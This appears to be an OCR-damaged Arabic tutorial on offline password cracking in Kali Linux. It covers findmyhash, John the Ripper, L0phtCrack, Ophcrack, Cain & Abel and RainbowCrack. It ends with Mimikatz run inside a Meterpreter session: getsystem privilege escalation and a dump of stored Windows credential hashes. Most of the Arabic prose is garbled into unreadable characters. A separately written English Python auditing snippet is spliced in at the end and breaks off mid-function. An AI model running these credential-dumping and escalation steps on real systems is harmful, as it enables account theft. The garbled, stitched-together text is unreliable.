root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99



Pass the HASH 

o jjiud^ll jjj-*lt cjLgK lit* <j£Jj t Windows LMj' SaiLo^I jj^II CjIaK ^Ia <jc Uja^j ^LuJI «^'o 

?NTLM 

jl c j£ai tdjj^i U£ j .Uj jjSI L^j j£ NTLM <j2Aa 'LM lA* NTLM <j2Aa jj^j ^-^1 



NTLM Hash r 

."Pass the Hash" ^uij j .^IkJI J jj^a jll <ul.ikU j L£ ^l^JI iUJl <LLouj ^V^j 

CjU^^ij jj^jll yi sbl jl ^\ <u£*j t*Ui axjj Local Security Authority Subsystem Service s 

-L> Aj J j| ^ ^Samba 

CjSJp) 7 jj^jj ^4 UAC ^ ^ViniAn ujUa ^laai) Sjj-a Lajl .CjUa^J) &a )3a 4-4jjfS ^Vmn kerberos jl NTLM2 

.Pass the Hash c> c> J'jj V ^ 

Passing the Hash with Metasploit Psexec ^ 
<iajudjj o^j*j <J-ac 3 1 ola ^ j^-j 6 . 6, ^ c ' ( -— j l Pass the Hash ^ ^ a laiLu^l l-uHjojVI ^ 1^1 j Psexec 

-Meterpreter c> 
Passing the Hash Toolkit 4- 

Kali Linux/Password Attacks/Passing the Hash 

l^a^JjoiJj 4 a\\ CjljLlk ^j-d D^cLabd (Jj^a^Jjojj ^ — help) JJJ^*^ ^ iklLuji ^^>^» . jj-^J 



JTR (John the Ripper): King of the Password Crackers 

jjo£3 obi t JTR 6 ^ jJI £y* ^ t° ^ ^^11 Jl^JI J jj^a jit ^^ialudj d& lij 
^1 jji jjuo£j l^J ^gjoij ^jJI CjI^j^JI ^ ^jAxJI L$j^ jJI <-d^klaui jj^Jl CjUJ£ jjuo^I 4 m ui &b! ji&l John the Ripper 
f> ^ ^litill c fll un^yi C5 ic Sj^SlI John the Ripper j Sj^^l jj^JJ ciLaK Laj & jjuJI ciLaK ^ 4 qV^ ^ 

_ 4^oK £J^juu3 4 alia all Jj^Iall <C j±La <C a lA^l^cl (j£-aJj 

jail! ^ J**j John the Ripper 
. (Dictionary words)oL*^ CjUK ^ jjoJI CjUK jjo£ JjUj 



.(brute-force) s (Jjjuujj cJj^-^ 6 lS-^ •^ c - 



ja.) * 4-JjJal jJflVI CIjIaKII jl ^ -Lff jJai jlaVi ^jjj j^Ull L_Lj>l^J 4_lxij P^gjuo Jjl jli SbVI ^l^klojl Ak. 

^3^ji3 _(Ja. ja. dl^J (j!>Lk (Jjj^I jsll CjliLo (jl aJ ,4juLuJ1 JjuJI CjI Jjo^J ^a j^J V CjVI^JI (j-a <^ W^jj 3115 

.wc -l FILENAME j-Vl lift 
.UjUIj lJjj^JI JaUjl Jj^iL JTR ^jij cLja 6 ji£l\ ^ cil3i£j 



# tr A-Z a-z < Word_File > All_Lower_Case_File



:c5 jVI^ cjiji jSsii yijy e ^io^i j^Vi <Jc Jis-a 



# sort -u All_Lower_Case_File > No_Duplicates_File



Password Attacks | Offline Attacks | John 



^11 <^ John the Ripper g3il 



^j-d ^ ^^jII 4 aI^II ^jjjIa (jjl^j l^iklj t^jjjl^JI jjl l^j^jlkl c^^il Jj^) - ^^ 4^<J£ jjLuIL ^ jij IjIIj t^Lplc 4^<J£ jll^j 

Jjj JTR ^ C5^^ ^ .^^^ ajjouIU 6jjSl<Jt CjI jlaaJl ^jl ^ ^U^l j ^ jJI 

Jlia jjII ^ia Jjjia liA J^-^ < ^'^^j .cracks per second (c/s) ^ o 1 ^ o- 3 ^^ j^j^^^ ^ 

# john --test

iiLujj ^^jII lIjIIia^jII jj >Aj ^aLiJI ^Uaill d^U£ Ai^stxi (ill ^jjjj ^I^Vl (JjjjjIL» till j^jj l_a jjuj 11a 

l_s jjuj c ^j3I j ^No Duplicates File ir*^ j (3^^°^^ Jll<JI c aLJi Jla ^j^aj^a^xJI cjUJ^II c aL> ^1,^ nnV 

.(/etc/john/john.conf) ^1^1 ^ c> !iA Jxi jSajj .a^I jjaV! cjU3£3! ^UjV jjj^I a^Ij^j 



[Options]
# Wordlist file name, to be used in batch mode
Wordlist = $JOHN/password.lst
# Use idle cycles only
LLLai l^j^^cl c _^j3! CjIaKII A^SXi jjjjuIj .Ujjaljjal passwords.lst ^1 ^ ^ LL *°^^ ^ 

cjUKII As^i LilS .(Wordlist = No_Duplicates_File.lst) J' (Wordlist = $JOHN/password.lst) ^ 
^l^ki^U t*Bi J .john.conf ^ j^JI ^ s^j* jjlj J No_Duplicates_File.lst 1*jI&L <^ 
jjui ; jjoJ! John the Ripper ^ l-ia^V .cjUKII ^ jl^j ^131 L_aLJI ^ (— wordlist) j^*^^ 

John the Ripper J^-^ ^ ^ .(/root/.john/) J^ll ^ john ^V^l J] ^ J) Vjl 

^> 

# john hash



root@JANA:~/.john# john hash
Warning: detected hash type "lm", but the string is also recognized as "nt"
Use the "--format=nt" option to force loading these as that type instead
Warning: detected hash type "lm", but the string is also recognized as "nt2"
Use the "--format=nt2" option to force loading these as that type instead
Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
                 (JANA)
                 (SUPPORT_388945a0)
                 (Guest)



.Enter <jj* j^l JMj^ & < ^ A£t <^ j-^VI Ski 4jjj] 

http://www.openwall.com/ 

Johnny 

. ^.K Jji^all ^Ikd ^UK jjo£ s j^l 4_n»JJI Cjli John the Ripper ( jjjViMl 4.1^ j3I ^^klaiJI ^ Johnny 
^1 jjV CjUI j^I iLkjU ^joij ^1 cjI£ j^JI (.> I^jJ Johnny < John the Ripper j*ljVI jl-^=] yr*J 
jjuJ! dLaKj cjUilgJI - la* ^ ^ VI c aJa^H ^^Jc. oj^ll Johnny .chW^j qj^-^I jj^>^I <*-^l£ ^ ^ jjuJI cjUJ£ ^ 

J^L titti] Johnny J^^JI SjSjl* jjp John the Ripper j^ljSft jk^ ^ SjSjIaJI CjU^^UI j*j ;4Jajal4 



Password Attacks | Offline Attacks and select Johnny 



:JN\ Johnny ?\**l^t 

;AJU3l <jujLaJl JJ^-la ^1 LS^^J 



[Screenshot: Johnny main window. Menus: File, Attack, Passwords. Toolbar: Open Passwd File, Start Attack, Resume Attack, Pause Attack, Copy. Side tabs: Options, Statistics, Settings, Output.]
J^l\ ^ q$ jl^j qfhW t^LJI ^jjaj I^Ll ^ ^\ j Open password file <jja j& cjIj^VI 3-^Ui3l J^Lk ^ 



[Screenshot: Johnny after opening the password file. The Passwords tab lists the five accounts (RIDs 500, 501, 1000, 1002 and 1003) with their LM hashes (33ef0e84e..., aad3b435b..., c3c226b0c..., aad3b435b..., aad3b435b...), their NT hashes as in the hash.txt listing above, and an empty GECOS column.]



^ j^Jl <c jj ^J^k c>« j Options , ^ c - u^*^ ( ♦ ]) \*>W ^5^* C5^^ ^ j^' -^j^ ^ j -^-^ ^3jj W^l J^Lk ^ 

,4\r\m ^jUj %90 J^j J^UI liA @jUj 



[Screenshot: Johnny, Options tab. General options: Format: Auto detect. Mode selection and settings: Default behaviour (selected), "Single crack" mode, Wordlist mode, "Incremental" mode, External mode. The Default behaviour tab explains that John runs "single crack" mode, then wordlist mode, then "incremental" mode, all with default settings.]



.U Jjjj CjUKJ) AajV A&u <U) wordlist mode <^ <> 



[Screenshot: Johnny, Options tab, Wordlist mode selected. Help text: "Wordlist mode uses data from wordlist file. As an addition rules could be applied. Section "Wordlist" would be used to mangle words with rules." Fields: Wordlist file (Browse), Use rules, Use external mode, filter name.]



L0phtCrack 

http://www.l0phtcrack.com 
dia jjojjj^jUJ jiLJI jjoJI cjUJ£ ^bjloaV * ^ iklujl ^jj .cAlnlaSlI o^IsujojIj a al£ (jAvil a aa^a sbl ^ LOphtCrack 
6jS jSa^ll L^J fhj brute force attacks j 'rainbow table 'hybrid 'dictionary ^L**j jj^j 

.LOphtCrack s^cLuax a} Lgic- t **&\\ jjAbj jjuJI a jiill ^Uaj ^ ^-L^li^ c _^a c _^j3I 4_iLgVI j^*-^ .jjj*^ 
^ill ASi-^J! ^tkj ^iiui <LAN Manager networking protocols JjSjSjjJI J^- < Jj^j J^ul( 
^UJI JjaJI qa jj^ (response) ^Ui^VI <> c^jU 24 f J^J (challenge) ciAjllI c> 8 t> uj^ 
<jUi^VI <> CjjU 24 ci^(response) ^W^VI ajjILu ^UJI UjL .challenge/response format J^ill 
^jjcLLa jj^Jl -j-^y 4_i* jjl j^J! ^ jkl dia .Ai^L^JI <jjlLJI ^jUjj I^jL ; j& L^IS ^ilt <j <j^aLkll (response) 

6L_fl^)^j AjUjoj JjoJI *LaK Jjuo^ (JJ*^ g a\\ ^-AuiJ j lS^^ ^Ua3 <j£3 (jjjlgJL ^al^l L_fl^)^j 4jUjoj (j* UJ^ «aflla 

<Lajla3l ^aiaill <J*-?^ >* u1 ^Aj^H J-*^ (J^ 1 A£jjoJI (jjjtg-ll (JUlSjI ( ; ^ > 6 ^jjoIa i '^t > >i .(J^jujI (Jjc^Jj 

^LOphtCrack 6. LOphtCrack brute-forcej dictionary LM 

<jc SjaslxJI (jjs jiJI ^aii dujjjll ^j^aLiJI wizard sbVI l_ ujjIIj ^ jij jjibj JjxjuHII ^Uaj 

.aJUII iJLSlI jj^> J\ ^jja (L0phtCrack6) 

[Screenshot: L0phtCrack Password Auditor v6.0.16, "L0phtCrack 6 Wizard". Left pane: Step 1 Start L0phtCrack Wizard, Step 2 Get Encrypted Passwords, through Step 5. Welcome text:]

Welcome to the L0phtCrack 6 Wizard. This wizard will prompt you with step-by-step instructions to get you auditing in minutes.
First, the wizard will help you determine where to retrieve your encrypted passwords from.
Second, you will be prompted with a few options regarding which methods to use to audit the passwords.
Third, you will be prompted with how you wish to report the results.
Then, L0phtCrack 6 will proceed auditing the passwords and report status to you along the way, notifying you when auditing is complete.
Press "Next" to continue with the wizard.




.I!**! {y±jA j& U£ A^ai i>jh±l\ UKij ^illj Next ti> LOphtCrack 6 Wizard ^ 

.ti> j^j Retrieve from the local machine ^ j 



[Screenshot: L0phtCrack Password Auditor v6.0.16, wizard page "Get Encrypted Passwords": "Choose one of the following methods to retrieve the encrypted passwords:"]

Retrieve from the local machine (selected): Pulls encrypted passwords from the local machine's registry. Administrator access is required.
Retrieve from a remote machine: Retrieve encrypted passwords from a remote machine on your domain. Administrator access is required.
Retrieve from SAM/SYSTEM backup: Use emergency repair disks, backup tapes, or volume shadow copy techniques to obtain a copy of the registry SAM and SYSTEM hives. This contains a copy of your non-domain passwords.
Retrieve by sniffing the local network: Sniffing captures encrypted hashes in transit over your network. Logins, file sharing and print sharing all use network authentication that can be captured.
[Screenshot: L0phtCrack Password Auditor v6.0.16. Toolbar: Run Wizard, Import Hashes, Import From Sniffer, Begin, Pause, Stop, Session Options. Wizard steps: Step 1 Start L0phtCrack Wizard, Step 2 Get Encrypted Passwords, Step 3 Choose Auditing Method, Step 4 Pick Reporting Style, Step 5 Begin Auditing. Page "Choose Auditing Method":]

Quick Password Audit (selected): This method checks only for simple passwords that you could find in a dictionary.
Common Password Audit: This method checks for simple passwords that you could find in a dictionary, as well as common modifications of dictionary words.
Strong Password Audit: This method checks for simple passwords that you could find in a dictionary, common modifications of dictionary words, and performs a brute force attack that attempts all combinations of standard letters and numbers.
Custom: Custom Options...

^ ^J 1 cs^j (auditing method) J^tiM t> tfj^Vl ^ jfc tiSHSlI SjIsaJI jVI 

Strong Password j*j ^tjSI .o^M ^^^1 ^jS jAtill i> ls' 

,<ju\J\ <kjxJI J\ Jiisll Next c3> Audit 




[Screenshot: L0phtCrack Password Auditor v6.0.16, wizard page "Pick Reporting Style":]

[x] Display passwords when audited: Most of the time, you'll want to know what the audited passwords are, but in some situations, you may wish to verify the safety of a password without disclosing what it is. Check this box to view the cracked passwords in the output.
[ ] Display encrypted password 'hashes': Check this box to display the encrypted passwords as they are seen by the operating system. These values may be of interest to some users and to others they may seem like excess clutter. To display the encrypted passwords, check this box.
[x] Display how long it took to audit each password: Checking this box will add a column to the output view that shows how long it took to audit each password.
[x] Display auditing method: Check this box to display the method used to find each password. This can be useful for identifying users who have particularly weak passwords.
[x] Make visible notification when auditing is done
(Back / Next buttons)
■ JtJ^\ o^j*^ cr^ cs^j Pick reporting Style u'j^ ^ ^ 

^ Ujlikj lJj^ dip. Display encrypted password 'hash' ^ ^ U^lj^l 

.wizard ^ Sj^Vl j 31^^31 JUi£U next <jja j& ^ ^ c£j^' 

.FINISH c3>^ 

■OK (jja j^" (Audit completed) ajLJI ^1 <iU <lt^j c*U j^j ^ 
.session options sbVl Jb* -SjjUI ^ j^Vl <-^lS ^ 

[Screenshot: L0phtCrack Password Auditor v6.0.16 - [Untitled 1], results view. Toolbar: Run Wizard, Import Hashes, Import From Sniffer, Begin, Pause, Stop, Session Options, Schedule Audit, Scheduled Tasks, Cracked Accounts, Weak Passwords, Expired Accounts, Disable Accounts, Force Password Change. Tabs: Run, Report. Columns: Domain, User Name, LM Password, Password Age (days), Locked Out. Rows: JANA-TEBA / jana (age 31) and JANA-TEBA / LANGUARD_11_USER (age 34). Status panel: words_done 29156 of 29156, 100.000%; hash_tables 0 of 0; hashes_found 0 of 0; total_users. Log:]

05/02/2014 23:55:25 Multi-core operation with 2 cores.
05/02/2014 23:55:35 Imported 2 accounts from the local machine
05/02/2014 23:55:35 Audit started.
05/02/2014 23:55:35 Auditing session completed.



:<^VI UA* J^j aJL^\ Session Options <ij* j^l ^ 
.Dictionary crack u' £ * j^' Crack NTLM Passwords 
.Dictionary/Brute Hybrid crack o'j^ £ * j^' Crack NTLM Passwords 
.Brute force crack u'j^ <r * Crack NTLM Passwords 
Enable Brute Force Minimum Character Count 
Enable Brute Force Maximum Character Count 

■OK c3j^ j& £ 



[Screenshot: L0phtCrack "Auditing Options For This Session" dialog]

Dictionary Crack
    Enabled; Crack NTLM Passwords; Dictionary List
    The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords.

Dictionary/Brute Hybrid Crack
    Enabled; Crack NTLM Passwords; Common letter substitutions (much slower); Characters to prepend; Characters to append
    The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords.

Precomputed
    Enabled; Hash File List; Preserve Precomputation Data; Location
    Also known as "rainbow tables", the Precomputed Crack tests for passwords against precompiled hashes contained in a file or files. This test is very fast and finds passwords created from the same character set as the precomputed hashes. Preserving precomputation data speeds up consecutive runs in exchange for disk space. This crack works against LM and NTLM passwords, but not Unix.

Brute Force Crack
    Enabled; Crack NTLM Passwords
    Character Set: alphabet + numbers
    Language: English
    Custom Character Set (list each character): ETNRIOASDHLCFPUMYGWVBXKQJZetnrioasdhlcfpumygwvbxkqjz0123456789
    Enable Brute Force Minimum Character Count; Enable Brute Force Maximum Character Count; Range: 1
    The Brute Force Crack tests for passwords that are made up of the characters specified in the character set. It finds passwords such as "WeR3pFt&" or "vC5XG9n-12b". This test is slow and finds medium to strong passwords.
    Enabling a start or end point lets you control the minimum and maximum number of characters to iterate.
    The actual maximum character count used may vary based on hash type.
    Specify a character set with more characters to crack stronger passwords.

Begin



^ BEGIN (jj^ jSjj j 4juinj3l 4JL!ti\ OK (ij* j^l ^ 
Ophcrack



http://ophcrack.sourceforge.net 



fWimrtll j <uV . jjuJI djUK jxjSI rainbow tables J jj^j jju£3 stal j& Ophcrack 

.Ophcrack c5jj^ GUI j^j^ ? ^aJLmall a ^ uaj j CLI jVI ^ ^ cs - ^ cS-iT-uifll ^Uaj j^jj 

.NTLM jLM c> ^LiU ^£ - 
^ Vij . nil l cjUKII j^£3 Brute-force module 

. jj^j^ t> SAM 4 — aL^l\ (j^JI J^^j <yj£ 
<jc s^x^JI jUI ^2 dujjjli ^jUtj (j^aLkJ! wizard sl^VI c_ uinj ^ jij jj^ijj ^it_uu3I ^Uaj o 

jj^Ji ^U3! jLaiJI ^liil Jjj jo t5 JlS J ±L uull ^Ikj jl 4_JU3I 4_^L^I l^^j^ (Ophcrack) 

Password Attacks | Offline Attacks | Ophcrack 



[Screenshot: ophcrack main window. Toolbar: Load, Help; tabs Progress, Statistics, Preferences. Columns: User, LM Hash, NT Hash, LM Pwd 1, LM Pwd 2, NT Pwd; table list with Directory and Status; status line "Preload: waiting   Brute force: waiting   Pwd found:   Time elapsed:".]



jUUj L_fl jjoj jl^xJl ^AaJ *LajUi IVl (J^*^ load ^ J C5 J^*-^ L — ^ J^VI -^J^ (j-* Ja^iLj o 

.tijLa US^j ^1 pwdump sbVl ^1 j^J g 3 ^ t> ^ PWDUMP file ^ jLpJI ^ i> .SAM 



[Screenshot: ophcrack "Load" menu]
Single hash
PWDUMP file
Session file
Encrypted SAM
Local SAM with samdump2
Local SAM with pwdump6
Remote SAM



[Screenshot: ophcrack after loading the PWDUMP file. Columns: User, LM Hash, NT Hash, LM Pwd 1, LM Pwd 2, NT Pwd, Directory. The loaded accounts include LANGUARD_11_USER; the hash values are unreadable in the source.]



.ajIUII jj^i> (^Jl <^Jjj Tables <ij3 jailU ^jl*JI CjIjjsVI ^}j^> ^ o 



[Screenshot: ophcrack "Table Selection" dialog]

Table               Directory   Status
XP free fast                    not installed
XP free small                   not installed
XP special                      not installed
XP german v1                    not installed
XP german v2                    not installed
Vista special                   not installed
Vista free                      not installed
Vista nine                      not installed
Vista eight                     not installed
Vista num                       not installed
Vista seven                     not installed
XP flash                        not installed
Vista eight XL                  not installed
Vista special XL                not installed

Legend: enabled / disabled / not installed
Buttons: Install, OK



Crack j jll (jj* J&j aj^uj jJI aJL5A\ ^ jj a \^<\ a*_> Rainbow table o^J 3-*^ ^aa J!^Lk ^ di^ o 
Cain & Abel



Source: http://www.oxid.it

CjUK (J* A atia a jjI S^UlaiV till 

'brute-force 'u^ CjIa^j* ^1,v^ Uj SjLU! jjuJI CjUK jjju£ j ^(sniffing network) 4£^t (jjuuaaoll J^Ll jjuJI 
^jlio s^Uiuilj '(decoding scrambled passwords) 3i jl^Jl jjuJI cjUK t*la < VolP^^^ <^ cjU^a 
£>i& ^ s^cLaixi . jj CjV j£ jj jjj lS^^ j tljSj-a jjoJI CiLaK c ^revealing password boxes ^aj^I^V 

.^^11 ^ cJ^ j uL^a j aJ^JI ^ ji im^M t ^> bSlsLaj ^1 (Arp Poison Routing) APR c> oj£z ai* 

JalSSlV cjU^^ ^ ^ jl^j <SSH-1 j HTTP SjiiuJI cjVj^jj jjJ! JJ^ Sj^IS I^jI ^ shVl ^ ^ Sniffing 

.jjjjill CjUII <> <*_Jj a^^^ ^> credentials 



[Screenshot: Cain & Abel, Cracker tab. Menu: File, View, Configure, Tools, Help. Tabs: Decoders, Network, Sniffer, Cracker, Traceroute, CCDU, Wireless, Query. Cracker tree: LM & NTLM Hashes, NTLMv2 Hashes (0), MS-Cache Hashes, Cisco IOS-MD5 Hashes, Cisco PIX-MD5 Hashes, CRAM-MD5 Hashes, OSPF-MD5 Hashes, RIPv2-MD5 Hashes, VRRP-HMAC Hashes, VNC-3DES (0), MD2 Hashes (0), MD4 Hashes (0), MD5 Hashes (0), SHA-1 Hashes (0), SHA-2 Hashes (0), RIPEMD-160 Hashes, Kerb5 PreAuth Hashes, Radius Shared-Key Hashes, IKE-PSK Hashes (0), MSSQL Hashes (0), MySQL Hashes (0). Columns: User Name, LM Password, < 8, NT Password, LM Hash, NT Hash. Context menu on a selected hash: Brute-Force Attack, Cryptanalysis Attack, Rainbowcrack-Online, ActiveSync, with sub-entries LM Hashes + challenge, NTLM Hashes, NTLM Hashes + challenge, NTLM Session Security Hashes; Select All, Test password, Add to list (Insert), Remove (Delete), Remove Machine Accounts, Remove All. Status bar: "LM & NTLM hashes", "Lost packets: 0%".]



Rainbowcrack 

http://www.project-rainbowcrack.com

^ Jj^ f ^V: .Rainbow table J if- c>M ^ ^""U (i^ 5 ja RainbowCrack 

Sc. t fllikj ^1 j j&^l j^£3 brute force cracker ^ ^ .u^W^ time-memory tradeoff 

J£ ^l^luil JjUj lJj^ jSI^JI j^Sl brute force cracker .time-memory tradeoff hash cracker a2*J1* 

plaintext-ciphertext ^} j3 ( . h > r *j RainbowCrack 6 j^VI \z*S j plaintexts 

^.I^jjVI ^j^j j ' J j^'^J^ l-jLoi^. ^.j^ ^2 j (jjxlujj ^ .rainbow table c j j^f* ^—^ j ^ ^ 

.<c jjaijj j^joij Rainbow table J ^ jiu^l o-^ill CjI jLill ^^Ic Sj^lS (Jj^j ^ jjuj 6l_jLoi^JI 
RainbowCrack 1.5

[Screenshot: RainbowCrack 1.5 GUI. Menu: File, Edit, Rainbow Table, Help. Columns: Hash, Plaintext, Plaintext in hex. Five MD5 hashes loaded (values unreadable in the source); recovered plaintexts: apple, green, qwerty, test (hex 6170706c65, 717765727479, 74657374); one hash not found. Loaded entries labelled Martin, Juggyboy, Jason, Shiela. Statistics panel, values as read from the screenshot:
time of alarm check:                          2.14 s
time of wait:                                 0.00 s
time of other operation:                      0.17 s
time of disk read:                            0.59 s
hash & reduce calculation of chain traverse:  (unreadable)
hash & reduce calculation of alarm check:     35916594
number of alarm:                              57632
speed of chain traverse:                      11.11 million/s
speed of alarm check:                         16.62 million/s]


.JLLa j2lt [rcrack *.rt -f Crackme] J^uJI J^-* £>a Lfral ,^Vihi) ££a4J ^JbS J Au lLII ^Uaj ^4 SIjSM aifc :4Jajala 

luaj) o^-aj ^IS JjLil!) ^Uaj ^4 m( Jtyl\ cij^au ^iH uiUil crackme til^M J^j Rainbow table [*.rt] 
4jL^li j*j ^UIj [rcracki_mt -h hash rainbow_table_pathname] 4jL£ JMj^ L^ajj rainbow crack ^l^l^l 

a A ftj < nil <j-<a AjJ^a 

#rcracki_mt -h hash rainbow_table_pathname
#rcracki_mt -l hash_list_file rainbow_table_pathname
#rcracki_mt -f pwdump_file rainbow_table_pathname
#rcracki_mt -c lst_file rainbow_table_pathname

jLdu^JI ^4 Sjjaj^JIj rainbow table ^I^oujI JI& j jlSfl cjIjjS?) <j^a*j j^jj JjLiUI ^Qaj ^4 Liajj 

,/usr/share/rainbowcrack/ 
rainbow table f LAW f iVmn ^ill r tgn 



root@kali:/usr/share/rainbowcrack# ./rtgen md5 loweralpha-numeric 1 5 0 3800 33554432 0
rainbow table md5_loweralpha-numeric#1-5_0_3800x33554432_0.rt parameters
hash algorithm:         md5
hash length:            16
charset:                abcdefghijklmnopqrstuvwxyz0123456789
charset in hex:         61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39
charset length:         36
plaintext length range: 1 - 5
reduce offset:          0x00000000
plaintext total:        62193780

sequential starting point begin from 0 (0x0000000000000000)
generating...



.rainbow table J^W hA±l\ ^jlSft qaxij 13jL« tj-te Ui±aJ ^311 Rcrack 
Mimikatz Tool to Recover Plain Text Passwords



t^uz^lA O^J t^Jxij La cJ*^ t ^ JaJjJalU ^-9l Jjl (^"^ (jl LI .C^-^C- (J^aj J Asu (jC JjuJI t ** )1 &l£ 6 AiU.ua I <JjLlj L_fl jjuj S-^^ ^ J 

Jl AiLjaj j < jj^jjj J^^ll Jo Ja*j jVI £*L ^Mimikatz p-al ^ .(windows process) jj^jll J^ 
.oAisu iuok. tiL^ uj^ ^ cjUK s^Uiuil Jx^j Lu> ^Meterpreter *^ j Metasploit J-H 
axj cjISjVi c> j£&& ^L& .(Benjamin Delpy) u^W^ J^ post-exploitation sbl Mimikatz 
La Ullc. j .A£djuj|/jj jjj^ll Jc IjUj ji&l ^ Ja Jc J jj^a^JI J I jjc. jj aS ^ &i j <l^L aJ jl exploitation ^-^^>^ 
^jj-A^l^xJI L_ic. jj c^jjuj Jilj o^jli ji&VI ^l^all Igiajj] aJjL^ ^ Mimikatz Aj\:*^ I ^-jIj^VI ^ 

-W* J 

.Microsoft jj^ 5*21 4J jU^ J <<>Vt fgAli* <jiju cjUjV Oj^j <>' ^ J*-* 5* 2007 ^ LjJUiit ^ SbVt aifc 
Ijja (JjjxaII <jVI ^ Wimlj . WindowscM 5* ^J^' 6* *^JjC ^«2J t4*i*a ^L-uSfl J Sbl ^AMimikatz 
&\ I j IS aj Mimikatz .SjSlil! <> Kerberos j^l^j PIN >j <o^' 'plaintexts ajki* jj£ iijA ^fe j^Jl cjUIS ^tjaa^iV 
L-alaJl ^jjLiaJI jl certificate v^!^ ,build Golden tickets jt pass-the-ticket 'pass-the-hash ^^J 2 

?Sj$ilt ... * vault '(private key) 

ciii JjJI ^ <Ll£ <c J jU ^LuJl meterpreter Mimikatz Metasploit ^jjS tfeaJI c>^ 



M^xili Si^lj 4-4j^£ v2.0 J«^W C^h^i 2^J 6 vl.O metasploit ^ Mimikatz jt^! 

jS) j-J) J^U t$Jp Jj^aJl ^jIojj ,v2.0 J! M J^' J- 4 ^ ^ J-<^ ^ dip. .Cij jjjV) Jp A*S j-ft Jp 

or directly 

https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140505
jl^aV) Jj-aaj jl metasploit Jl ^ rapid7 cfeS <> meterpreter J^Jt jl^VI 4iLia) ^ 

: JUlt jSj^J) &a metasploit JJ o^^LaJ) 
https://github.com/rapid7/meterpreter/tree/master/source/extensions/kiwi 
https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions



Loading Mimikatz ^ 

diljLii«l ^ lU*^ Jlt(session) <^kJI jl ^ ^hll a^Uj meterpreter J^ Jj^^lj exploit ^ 

Mimikatz lU*^ ^ (System privilege) c5 i 1 ^ 



meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM



; JVI^ getsystem c^Ja ^ system cj! jUi^l Jl Ji±ai c jl<ua system ^U^W V ^ lij ^> 



meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM



c> ti^iJ! J] ^UUj ^ SYSTEM cjIjU^I J! aAJU ±u .bit64 j bit32 ^> ^ Mimikatz 

c-LLoaj lJjjoj jllj ULoj jjjj J li^i bit32 »li Mimikatz J^4? ^ bit64 ^ ^j ."sysinfo" j^Vl ^ 
meterpreter > sysinfo
Computer        : TEBA-293DD90F08
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32




^ .load mimikatz j*VI ^l^i^U o-aUJI MimikatzJ^^ bit32 yr* ^ u' ^ 




■help c&J^ j*\ jVl c>a .load mimikatz.64 j*VI ^.iki^a bit64^t 




meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > help mimikatz

Mimikatz Commands

    Command           Description
    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds





(JjIj jj <j2A$]l <yj^j < Mimikatz <J1 ^l^luiVI jSSVl s j^ll U3 yr^ ^ Metasploit 

j^VI jli 4t*Bi .SjSlill Sj^Ux (dumping hashes and clear text credentials straight) uP lk^j*^ 

.Mimikatz ^ ^ ^ cU^ll J jll Ul ^jjj "mimikatz_command" 



meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Dec  4 2013 16:18:53)
meterpreter > mimikatz_command -f fu::
Module : 'fu' introuvable

Modules disponibles :
                - Standard
        crypto  - Cryptographie et certificats
          hash  - Hash
        system  - Gestion système
       process  - Manipulation des processus
        thread  - Manipulation des threads
       service  - Manipulation des services
     privilege  - Manipulation des privilèges
        handle  - Manipulation des handles
   impersonate  - Manipulation tokens d'accès
       winmine  - Manipulation du démineur



Reading Hashes and Passwords from Memory



<> clear-text credentialsj lW jrlj^V Mimikatz metasploit c> jJjVl <> f\mJ U&aj 



meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials

AuthID   Package    Domain           User              Password
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;38315  NTLM       TEBA-293DD90F08  JANA              lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;30615  NTLM                                          n.s. (Credentials KO)
0;999    NTLM       WORKGROUP        TEBA-293DD90F08$  n.s. (Credentials KO)
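The msv listing above shows the two well-known hashes of an empty password, lm{ aad3b435b51404eeaad3b435b51404ee } and ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }. As an added, defender-side example (not part of the original book or of Mimikatz), the following Python recomputes the empty NT hash from its definition (MD4 over the UTF-16LE password) and audits dump lines of this shape for blank passwords and for accounts that still carry a real LM hash; the sample lines, the AUDITOR account and its hash values are constructed.

```python
"""Audit msv/pwdump-style hash listings for blank passwords and stored LM hashes.

Added example for this page; not part of the original book or of Mimikatz.
The NT hash is MD4(UTF-16LE(password)), so the NT hash of "" is plain MD4("").
MD4 is implemented here because many OpenSSL builds disable hashlib's md4.
"""
import re
import struct

# LM hash of an empty password, as it appears in the msv output above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian

    def F(x, y, z): return (x & y) | (~x & z)
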